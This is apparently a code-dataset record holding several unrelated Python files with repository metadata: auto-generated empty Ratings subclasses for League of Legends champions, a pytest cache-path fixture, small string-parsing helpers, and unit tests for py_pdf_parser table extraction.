| 6,821
|
py
|
Python
|
loldib/getratings/models/NA/na_vladimir/na_vladimir_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_vladimir/na_vladimir_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_vladimir/na_vladimir_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
# Auto-generated marker classes: one empty Ratings subclass per champion,
# keyed as NA_Vladimir_Sup_<Champion>.  The classes carry no behavior of
# their own; presumably the Ratings base (defined in
# getratings.models.ratings) uses the subclass name to identify the
# region/champion/role combination — TODO confirm against the base class.
class NA_Vladimir_Sup_Aatrox(Ratings):
    pass
class NA_Vladimir_Sup_Ahri(Ratings):
    pass
class NA_Vladimir_Sup_Akali(Ratings):
    pass
class NA_Vladimir_Sup_Alistar(Ratings):
    pass
class NA_Vladimir_Sup_Amumu(Ratings):
    pass
class NA_Vladimir_Sup_Anivia(Ratings):
    pass
class NA_Vladimir_Sup_Annie(Ratings):
    pass
class NA_Vladimir_Sup_Ashe(Ratings):
    pass
class NA_Vladimir_Sup_AurelionSol(Ratings):
    pass
class NA_Vladimir_Sup_Azir(Ratings):
    pass
class NA_Vladimir_Sup_Bard(Ratings):
    pass
class NA_Vladimir_Sup_Blitzcrank(Ratings):
    pass
class NA_Vladimir_Sup_Brand(Ratings):
    pass
class NA_Vladimir_Sup_Braum(Ratings):
    pass
class NA_Vladimir_Sup_Caitlyn(Ratings):
    pass
class NA_Vladimir_Sup_Camille(Ratings):
    pass
class NA_Vladimir_Sup_Cassiopeia(Ratings):
    pass
class NA_Vladimir_Sup_Chogath(Ratings):
    pass
class NA_Vladimir_Sup_Corki(Ratings):
    pass
class NA_Vladimir_Sup_Darius(Ratings):
    pass
class NA_Vladimir_Sup_Diana(Ratings):
    pass
class NA_Vladimir_Sup_Draven(Ratings):
    pass
class NA_Vladimir_Sup_DrMundo(Ratings):
    pass
class NA_Vladimir_Sup_Ekko(Ratings):
    pass
class NA_Vladimir_Sup_Elise(Ratings):
    pass
class NA_Vladimir_Sup_Evelynn(Ratings):
    pass
class NA_Vladimir_Sup_Ezreal(Ratings):
    pass
class NA_Vladimir_Sup_Fiddlesticks(Ratings):
    pass
class NA_Vladimir_Sup_Fiora(Ratings):
    pass
class NA_Vladimir_Sup_Fizz(Ratings):
    pass
class NA_Vladimir_Sup_Galio(Ratings):
    pass
class NA_Vladimir_Sup_Gangplank(Ratings):
    pass
class NA_Vladimir_Sup_Garen(Ratings):
    pass
class NA_Vladimir_Sup_Gnar(Ratings):
    pass
class NA_Vladimir_Sup_Gragas(Ratings):
    pass
class NA_Vladimir_Sup_Graves(Ratings):
    pass
class NA_Vladimir_Sup_Hecarim(Ratings):
    pass
class NA_Vladimir_Sup_Heimerdinger(Ratings):
    pass
class NA_Vladimir_Sup_Illaoi(Ratings):
    pass
class NA_Vladimir_Sup_Irelia(Ratings):
    pass
class NA_Vladimir_Sup_Ivern(Ratings):
    pass
class NA_Vladimir_Sup_Janna(Ratings):
    pass
class NA_Vladimir_Sup_JarvanIV(Ratings):
    pass
class NA_Vladimir_Sup_Jax(Ratings):
    pass
class NA_Vladimir_Sup_Jayce(Ratings):
    pass
class NA_Vladimir_Sup_Jhin(Ratings):
    pass
class NA_Vladimir_Sup_Jinx(Ratings):
    pass
class NA_Vladimir_Sup_Kalista(Ratings):
    pass
class NA_Vladimir_Sup_Karma(Ratings):
    pass
class NA_Vladimir_Sup_Karthus(Ratings):
    pass
class NA_Vladimir_Sup_Kassadin(Ratings):
    pass
class NA_Vladimir_Sup_Katarina(Ratings):
    pass
class NA_Vladimir_Sup_Kayle(Ratings):
    pass
class NA_Vladimir_Sup_Kayn(Ratings):
    pass
class NA_Vladimir_Sup_Kennen(Ratings):
    pass
class NA_Vladimir_Sup_Khazix(Ratings):
    pass
class NA_Vladimir_Sup_Kindred(Ratings):
    pass
class NA_Vladimir_Sup_Kled(Ratings):
    pass
class NA_Vladimir_Sup_KogMaw(Ratings):
    pass
class NA_Vladimir_Sup_Leblanc(Ratings):
    pass
class NA_Vladimir_Sup_LeeSin(Ratings):
    pass
class NA_Vladimir_Sup_Leona(Ratings):
    pass
class NA_Vladimir_Sup_Lissandra(Ratings):
    pass
class NA_Vladimir_Sup_Lucian(Ratings):
    pass
class NA_Vladimir_Sup_Lulu(Ratings):
    pass
class NA_Vladimir_Sup_Lux(Ratings):
    pass
class NA_Vladimir_Sup_Malphite(Ratings):
    pass
class NA_Vladimir_Sup_Malzahar(Ratings):
    pass
class NA_Vladimir_Sup_Maokai(Ratings):
    pass
class NA_Vladimir_Sup_MasterYi(Ratings):
    pass
class NA_Vladimir_Sup_MissFortune(Ratings):
    pass
class NA_Vladimir_Sup_MonkeyKing(Ratings):
    pass
class NA_Vladimir_Sup_Mordekaiser(Ratings):
    pass
class NA_Vladimir_Sup_Morgana(Ratings):
    pass
class NA_Vladimir_Sup_Nami(Ratings):
    pass
class NA_Vladimir_Sup_Nasus(Ratings):
    pass
class NA_Vladimir_Sup_Nautilus(Ratings):
    pass
class NA_Vladimir_Sup_Nidalee(Ratings):
    pass
class NA_Vladimir_Sup_Nocturne(Ratings):
    pass
class NA_Vladimir_Sup_Nunu(Ratings):
    pass
class NA_Vladimir_Sup_Olaf(Ratings):
    pass
class NA_Vladimir_Sup_Orianna(Ratings):
    pass
class NA_Vladimir_Sup_Ornn(Ratings):
    pass
class NA_Vladimir_Sup_Pantheon(Ratings):
    pass
class NA_Vladimir_Sup_Poppy(Ratings):
    pass
class NA_Vladimir_Sup_Quinn(Ratings):
    pass
class NA_Vladimir_Sup_Rakan(Ratings):
    pass
class NA_Vladimir_Sup_Rammus(Ratings):
    pass
class NA_Vladimir_Sup_RekSai(Ratings):
    pass
class NA_Vladimir_Sup_Renekton(Ratings):
    pass
class NA_Vladimir_Sup_Rengar(Ratings):
    pass
class NA_Vladimir_Sup_Riven(Ratings):
    pass
class NA_Vladimir_Sup_Rumble(Ratings):
    pass
class NA_Vladimir_Sup_Ryze(Ratings):
    pass
class NA_Vladimir_Sup_Sejuani(Ratings):
    pass
class NA_Vladimir_Sup_Shaco(Ratings):
    pass
class NA_Vladimir_Sup_Shen(Ratings):
    pass
class NA_Vladimir_Sup_Shyvana(Ratings):
    pass
class NA_Vladimir_Sup_Singed(Ratings):
    pass
class NA_Vladimir_Sup_Sion(Ratings):
    pass
class NA_Vladimir_Sup_Sivir(Ratings):
    pass
class NA_Vladimir_Sup_Skarner(Ratings):
    pass
class NA_Vladimir_Sup_Sona(Ratings):
    pass
class NA_Vladimir_Sup_Soraka(Ratings):
    pass
class NA_Vladimir_Sup_Swain(Ratings):
    pass
class NA_Vladimir_Sup_Syndra(Ratings):
    pass
class NA_Vladimir_Sup_TahmKench(Ratings):
    pass
class NA_Vladimir_Sup_Taliyah(Ratings):
    pass
class NA_Vladimir_Sup_Talon(Ratings):
    pass
class NA_Vladimir_Sup_Taric(Ratings):
    pass
class NA_Vladimir_Sup_Teemo(Ratings):
    pass
class NA_Vladimir_Sup_Thresh(Ratings):
    pass
class NA_Vladimir_Sup_Tristana(Ratings):
    pass
class NA_Vladimir_Sup_Trundle(Ratings):
    pass
class NA_Vladimir_Sup_Tryndamere(Ratings):
    pass
class NA_Vladimir_Sup_TwistedFate(Ratings):
    pass
class NA_Vladimir_Sup_Twitch(Ratings):
    pass
class NA_Vladimir_Sup_Udyr(Ratings):
    pass
class NA_Vladimir_Sup_Urgot(Ratings):
    pass
class NA_Vladimir_Sup_Varus(Ratings):
    pass
class NA_Vladimir_Sup_Vayne(Ratings):
    pass
class NA_Vladimir_Sup_Veigar(Ratings):
    pass
class NA_Vladimir_Sup_Velkoz(Ratings):
    pass
class NA_Vladimir_Sup_Vi(Ratings):
    pass
class NA_Vladimir_Sup_Viktor(Ratings):
    pass
class NA_Vladimir_Sup_Vladimir(Ratings):
    pass
class NA_Vladimir_Sup_Volibear(Ratings):
    pass
class NA_Vladimir_Sup_Warwick(Ratings):
    pass
class NA_Vladimir_Sup_Xayah(Ratings):
    pass
class NA_Vladimir_Sup_Xerath(Ratings):
    pass
class NA_Vladimir_Sup_XinZhao(Ratings):
    pass
class NA_Vladimir_Sup_Yasuo(Ratings):
    pass
class NA_Vladimir_Sup_Yorick(Ratings):
    pass
class NA_Vladimir_Sup_Zac(Ratings):
    pass
class NA_Vladimir_Sup_Zed(Ratings):
    pass
class NA_Vladimir_Sup_Ziggs(Ratings):
    pass
class NA_Vladimir_Sup_Zilean(Ratings):
    pass
class NA_Vladimir_Sup_Zyra(Ratings):
    pass
| 16.357314
| 46
| 0.776133
| 972
| 6,821
| 5.020576
| 0.151235
| 0.197951
| 0.42418
| 0.509016
| 0.814139
| 0.814139
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162879
| 6,821
| 416
| 47
| 16.396635
| 0.854641
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
d2ec0c4bd971c02f74d2e76a1235a7c94d05cafd
| 151
|
py
|
Python
|
tests/conftest.py
|
kiryteo/pytorch-bioimage-io
|
53373c45d3833b35657914953aaac544ec794a7e
|
[
"MIT"
] | 1
|
2021-08-04T04:03:37.000Z
|
2021-08-04T04:03:37.000Z
|
tests/test_bioimage-io/conftest.py
|
LalithShiyam/pytorch-3dunet
|
f6b6c13cb0bb6194e95976b0245b76aaa9e9a496
|
[
"MIT"
] | null | null | null |
tests/test_bioimage-io/conftest.py
|
LalithShiyam/pytorch-3dunet
|
f6b6c13cb0bb6194e95976b0245b76aaa9e9a496
|
[
"MIT"
] | 1
|
2022-03-14T04:43:24.000Z
|
2022-03-14T04:43:24.000Z
|
import os
from pathlib import Path
import pytest
@pytest.fixture
def cache_path(tmp_path):
    """Return the pybio cache directory as a Path.

    Honours the PYBIO_CACHE_PATH environment variable when set; otherwise
    falls back to pytest's per-test ``tmp_path`` directory.
    """
    location = os.environ.get("PYBIO_CACHE_PATH", tmp_path)
    return Path(location)
| 15.1
| 56
| 0.774834
| 24
| 151
| 4.666667
| 0.541667
| 0.160714
| 0.214286
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139073
| 151
| 9
| 57
| 16.777778
| 0.861538
| 0
| 0
| 0
| 0
| 0
| 0.10596
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
960e10bfd5f5eb8370b3c05a92ff07f0e2cc6e5c
| 198
|
py
|
Python
|
prototyping/utils.py
|
QuVil/mon-bot-le-dj
|
e9320fc19b1665dbb023c5eac015a208ba612750
|
[
"MIT"
] | 5
|
2020-06-25T17:12:53.000Z
|
2020-07-22T16:03:19.000Z
|
prototyping/utils.py
|
QuVil/mon-bot-le-dj
|
e9320fc19b1665dbb023c5eac015a208ba612750
|
[
"MIT"
] | 3
|
2020-06-29T22:24:32.000Z
|
2020-08-30T10:45:44.000Z
|
prototyping/utils.py
|
QuVil/mon-bot-le-dj
|
e9320fc19b1665dbb023c5eac015a208ba612750
|
[
"MIT"
] | null | null | null |
def string_or_none(string: str) -> object:
    """Return *string* unchanged when it is truthy, otherwise None."""
    # `or` yields the left operand when truthy and None for "" (or any
    # other falsy input), matching the original conditional expression.
    return string or None
def as_real_or_none(string: str) -> object:
    """Parse a number that may use a decimal comma ("1,5" -> 1.5).

    Accepts either ',' or '.' as the decimal separator.  Returns the float
    value, or None when the input is not numeric text (including empty
    strings and non-string inputs such as None).
    """
    try:
        return float(string.replace(',', '.'))
    except (AttributeError, TypeError, ValueError):
        # AttributeError/TypeError: input is not a str (no .replace / not
        # convertible); ValueError: text is not a valid number.  The original
        # bare `except:` also swallowed SystemExit/KeyboardInterrupt.
        return None
| 28.285714
| 47
| 0.686869
| 29
| 198
| 4.517241
| 0.517241
| 0.091603
| 0.183206
| 0.229008
| 0.320611
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 198
| 7
| 48
| 28.285714
| 0.808642
| 0
| 0
| 0
| 0
| 0
| 0.010101
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
82491719a960fe81cca2c6d25756756dc4f27aa7
| 23,875
|
py
|
Python
|
tests/test_tables.py
|
SimonHurst/py-pdf-parser
|
4186115b64115e9916475d4a034542a64f57457b
|
[
"MIT"
] | null | null | null |
tests/test_tables.py
|
SimonHurst/py-pdf-parser
|
4186115b64115e9916475d4a034542a64f57457b
|
[
"MIT"
] | null | null | null |
tests/test_tables.py
|
SimonHurst/py-pdf-parser
|
4186115b64115e9916475d4a034542a64f57457b
|
[
"MIT"
] | null | null | null |
from py_pdf_parser.common import BoundingBox
from py_pdf_parser.exceptions import (
InvalidTableError,
InvalidTableHeaderError,
TableExtractionError,
)
from py_pdf_parser.tables import (
extract_simple_table,
extract_table,
get_text_from_table,
_validate_table_shape,
add_header_to_table,
)
from .base import BaseTestCase
from .utils import create_pdf_document, create_pdf_element, FakePDFMinerTextElement
class TestTables(BaseTestCase):
    def test_extract_simple_table(self):
        """extract_simple_table: 2x2 grid extracts row-major; ragged grid raises."""
        # Checks that simple 2*2 table is correctly extracted
        #
        # elem_1 elem_2
        # elem_3 elem_4
        #
        elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
        elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
        elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
        elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
        document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
        elem_list = document.elements
        result = extract_simple_table(elem_list)
        self.assertEqual(len(result), 2)
        self.assertEqual(len(result[0]), 2)
        self.assertEqual(len(result[1]), 2)
        self.assert_original_element_list_list_equal(
            [[elem_1, elem_2], [elem_3, elem_4]], result
        )
        # Checks that it raises an exception when table is not rectangular i.e table
        # has empty cells
        #
        # elem_1 elem_2
        # elem_3 elem_4 elem_5
        #
        elem_5 = FakePDFMinerTextElement(bounding_box=BoundingBox(11, 15, 0, 5))
        document = create_pdf_document(
            elements=[elem_1, elem_2, elem_3, elem_4, elem_5]
        )
        elem_list = document.elements
        with self.assertRaises(TableExtractionError):
            extract_simple_table(elem_list)
    def test_extract_simple_table_with_gaps(self):
        """extract_simple_table with allow_gaps=True: missing cells become None."""
        # elem_1 elem_2 elem_3
        # elem_4 elem_5
        elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
        elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
        elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(11, 15, 6, 10))
        elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
        elem_5 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
        document = create_pdf_document(
            elements=[elem_1, elem_2, elem_3, elem_4, elem_5]
        )
        elem_list = document.elements
        result = extract_simple_table(elem_list, allow_gaps=True)
        self.assertEqual(len(result), 2)
        self.assertEqual(len(result[0]), 3)
        self.assertEqual(len(result[1]), 3)
        self.assert_original_element_list_list_equal(
            [[elem_1, elem_2, elem_3], [elem_4, elem_5, None]], result
        )
    def test_extract_simple_table_with_gaps_and_different_reference(self):
        """allow_gaps with an explicit reference_element that sits in every row/col."""
        # elem_1 elem_2 elem_3
        # elem_4 elem_5
        elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
        elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
        elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(11, 15, 6, 10))
        elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
        elem_5 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
        document = create_pdf_document(
            elements=[elem_1, elem_2, elem_3, elem_4, elem_5]
        )
        elem_list = document.elements
        reference_element = self.extract_element_from_list(elem_2, elem_list)
        result = extract_simple_table(
            elem_list, allow_gaps=True, reference_element=reference_element
        )
        self.assertEqual(len(result), 2)
        self.assertEqual(len(result[0]), 3)
        self.assertEqual(len(result[1]), 3)
        self.assert_original_element_list_list_equal(
            [[elem_1, elem_2, elem_3], [elem_4, elem_5, None]], result
        )
    def test_extract_simple_table_with_gaps_and_wrong_reference(self):
        """A reference_element whose column has a gap must raise TableExtractionError."""
        # elem_1 elem_2 elem_3
        # elem_4 elem_5
        elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
        elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
        elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(11, 15, 6, 10))
        elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
        elem_5 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
        document = create_pdf_document(
            elements=[elem_1, elem_2, elem_3, elem_4, elem_5]
        )
        elem_list = document.elements
        # elem_3 is the only element in its column, so it cannot anchor the grid.
        reference_element = self.extract_element_from_list(elem_3, elem_list)
        with self.assertRaises(TableExtractionError):
            extract_simple_table(
                elem_list, allow_gaps=True, reference_element=reference_element
            )
    def test_extract_simple_table_from_different_pages(self):
        """extract_simple_table across two pages: rows concatenate page by page."""
        # Checks that simple 2*2 tables are correctly extracted from different pages
        #
        # Page 1:
        # elem_p1_1 elem_p1_2
        # elem_p1_3 elem_p1_4
        #
        # Page 2:
        # elem_p2_1 elem_p2_2
        # elem_p2_3 elem_p2_4
        #
        elem_p1_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
        elem_p1_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
        elem_p1_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
        elem_p1_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
        elem_p2_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
        elem_p2_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
        elem_p2_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
        elem_p2_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
        document = create_pdf_document(
            elements={
                1: [elem_p1_1, elem_p1_2, elem_p1_3, elem_p1_4],
                2: [elem_p2_1, elem_p2_2, elem_p2_3, elem_p2_4],
            }
        )
        elem_list = document.elements
        result = extract_simple_table(elem_list)
        self.assertEqual(len(result), 4)
        self.assertEqual(len(result[0]), 2)
        self.assertEqual(len(result[1]), 2)
        self.assertEqual(len(result[2]), 2)
        self.assertEqual(len(result[3]), 2)
        self.assert_original_element_list_list_equal(
            [
                [elem_p1_1, elem_p1_2],
                [elem_p1_3, elem_p1_4],
                [elem_p2_1, elem_p2_2],
                [elem_p2_3, elem_p2_4],
            ],
            result,
        )
    def test_extract_simple_table_with_tolerance(self):
        """A slight cell overlap raises by default but succeeds with tolerance=0.2."""
        # Checks that simple 2*2 table is correctly extracted
        #
        # elem_1 elem_2
        # elem_3 elem_4
        # But with elem_4 slightly overlapping elem_2, counteracted by setting tolerance
        elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
        elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
        elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
        elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 6.1))
        document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
        elem_list = document.elements
        with self.assertRaises(TableExtractionError):
            extract_simple_table(elem_list)
        result = extract_simple_table(elem_list, tolerance=0.2)
        self.assertEqual(len(result), 2)
        self.assertEqual(len(result[0]), 2)
        self.assertEqual(len(result[1]), 2)
        self.assert_original_element_list_list_equal(
            [[elem_1, elem_2], [elem_3, elem_4]], result
        )
def test_extract_table(self):
# Checks that simple 2*2 table is correctly extracted
#
# elem_1 elem_2
# elem_3 elem_4
#
elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
elem_list = document.elements
result = extract_table(elem_list)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assert_original_element_list_list_equal(
[[elem_1, elem_2], [elem_3, elem_4]], result
)
# Checks that the following table is correctly extracted
#
# elem_1 elem_2 elem_6
# elem_3 elem_4 elem_5
#
elem_5 = FakePDFMinerTextElement(bounding_box=BoundingBox(11, 15, 0, 5))
elem_6 = FakePDFMinerTextElement(bounding_box=BoundingBox(16, 20, 6, 10))
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5, elem_6]
)
elem_list = document.elements
result = extract_table(elem_list)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 4)
self.assertEqual(len(result[1]), 4)
self.assert_original_element_list_list_equal(
[[elem_1, elem_2, None, elem_6], [elem_3, elem_4, elem_5, None]], result
)
# Checks that it raises an error if one element is in two rows
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(3, 8, 6, 10))
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5, elem_6]
)
elem_list = document.elements
with self.assertRaises(TableExtractionError):
result = extract_table(elem_list)
# Checks that it raises an error if one element is in two columns
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 3, 8))
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5, elem_6]
)
elem_list = document.elements
with self.assertRaises(TableExtractionError):
result = extract_table(elem_list)
    def test_extract_table_from_different_pages(self):
        """extract_table across two pages: rows concatenate page by page."""
        # Checks that simple 2*2 tables are correctly extracted from different pages
        #
        # Page 1:
        # elem_p1_1 elem_p1_2
        # elem_p1_3 elem_p1_4
        #
        # Page 2:
        # elem_p2_1 elem_p2_2
        # elem_p2_3 elem_p2_4
        #
        elem_p1_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
        elem_p1_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
        elem_p1_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
        elem_p1_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
        elem_p2_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
        elem_p2_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
        elem_p2_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
        elem_p2_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
        document = create_pdf_document(
            elements={
                1: [elem_p1_1, elem_p1_2, elem_p1_3, elem_p1_4],
                2: [elem_p2_1, elem_p2_2, elem_p2_3, elem_p2_4],
            }
        )
        elem_list = document.elements
        result = extract_table(elem_list)
        self.assertEqual(len(result), 4)
        self.assertEqual(len(result[0]), 2)
        self.assertEqual(len(result[1]), 2)
        self.assertEqual(len(result[2]), 2)
        self.assertEqual(len(result[3]), 2)
        self.assert_original_element_list_list_equal(
            [
                [elem_p1_1, elem_p1_2],
                [elem_p1_3, elem_p1_4],
                [elem_p2_1, elem_p2_2],
                [elem_p2_3, elem_p2_4],
            ],
            result,
        )
    def test_extract_table_with_tolerance(self):
        """extract_table: slight overlap raises by default, succeeds with tolerance=0.2."""
        # Checks that simple 2*2 table is correctly extracted
        #
        # elem_1 elem_2
        # elem_3 elem_4
        #
        # But with elem_4 slightly overlapping elem_2, counteracted by setting tolerance
        elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
        elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
        elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
        elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 6.1))
        document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
        elem_list = document.elements
        with self.assertRaises(TableExtractionError):
            extract_table(elem_list)
        result = extract_table(elem_list, tolerance=0.2)
        self.assertEqual(len(result), 2)
        self.assertEqual(len(result[0]), 2)
        self.assertEqual(len(result[1]), 2)
        self.assert_original_element_list_list_equal(
            [[elem_1, elem_2], [elem_3, elem_4]], result
        )
    def test_extract_text_from_simple_table(self):
        """as_text=True returns cell text; strip_text=False keeps trailing whitespace."""
        # Checks that text from simple 2*2 table is correctly extracted
        #
        # elem_1 elem_2
        # elem_3 elem_4
        #
        elem_1 = FakePDFMinerTextElement(
            bounding_box=BoundingBox(0, 5, 6, 10), text="fake_text_1"
        )
        elem_2 = FakePDFMinerTextElement(
            bounding_box=BoundingBox(6, 10, 6, 10), text="fake_text_2"
        )
        elem_3 = FakePDFMinerTextElement(
            bounding_box=BoundingBox(0, 5, 0, 5), text="fake_text_3"
        )
        elem_4 = FakePDFMinerTextElement(
            bounding_box=BoundingBox(6, 10, 0, 5), text="fake_text_4 "
        )
        document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
        elem_list = document.elements
        result = extract_simple_table(elem_list, as_text=True)
        self.assertEqual(len(result), 2)
        self.assertEqual(len(result[0]), 2)
        self.assertEqual(len(result[1]), 2)
        self.assertListEqual(
            [["fake_text_1", "fake_text_2"], ["fake_text_3", "fake_text_4"]], result
        )
        result = extract_simple_table(elem_list, as_text=True, strip_text=False)
        self.assertListEqual(
            [["fake_text_1", "fake_text_2"], ["fake_text_3", "fake_text_4 "]], result
        )
def test_extract_text_from_table(self):
# Checks that text from 2*2 table is correctly extracted
#
# elem_1 elem_2
# elem_3 elem_4
#
elem_1 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 6, 10), text="fake_text_1"
)
elem_2 = FakePDFMinerTextElement(
bounding_box=BoundingBox(6, 10, 6, 10), text="fake_text_2"
)
elem_3 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 0, 5), text="fake_text_3"
)
elem_4 = FakePDFMinerTextElement(
bounding_box=BoundingBox(6, 10, 0, 5), text="fake_text_4 "
)
document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
elem_list = document.elements
result = extract_table(elem_list, as_text=True)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assertListEqual(
[["fake_text_1", "fake_text_2"], ["fake_text_3", "fake_text_4"]], result
)
result = extract_table(elem_list, as_text=True, strip_text=False)
self.assertListEqual(
[["fake_text_1", "fake_text_2"], ["fake_text_3", "fake_text_4 "]], result
)
# Checks that text from the following table is correctly extracted
#
# elem_1 elem_2 elem_6
# elem_3 elem_4 elem_5
#
elem_5 = FakePDFMinerTextElement(
bounding_box=BoundingBox(11, 15, 0, 5), text="fake_text_5"
)
elem_6 = FakePDFMinerTextElement(
bounding_box=BoundingBox(16, 20, 6, 10), text="fake_text_6"
)
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5, elem_6]
)
elem_list = document.elements
result = extract_table(elem_list, as_text=True)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 4)
self.assertEqual(len(result[1]), 4)
self.assertListEqual(
[
["fake_text_1", "fake_text_2", "", "fake_text_6"],
["fake_text_3", "fake_text_4", "fake_text_5", ""],
],
result,
)
result = extract_table(elem_list, as_text=True, strip_text=False)
self.assertListEqual(
[
["fake_text_1", "fake_text_2", "", "fake_text_6"],
["fake_text_3", "fake_text_4 ", "fake_text_5", ""],
],
result,
)
def test_add_header_to_table(self):
# Checks behaviour if header is not provided
table = []
result = add_header_to_table(table)
self.assertEqual(result, [])
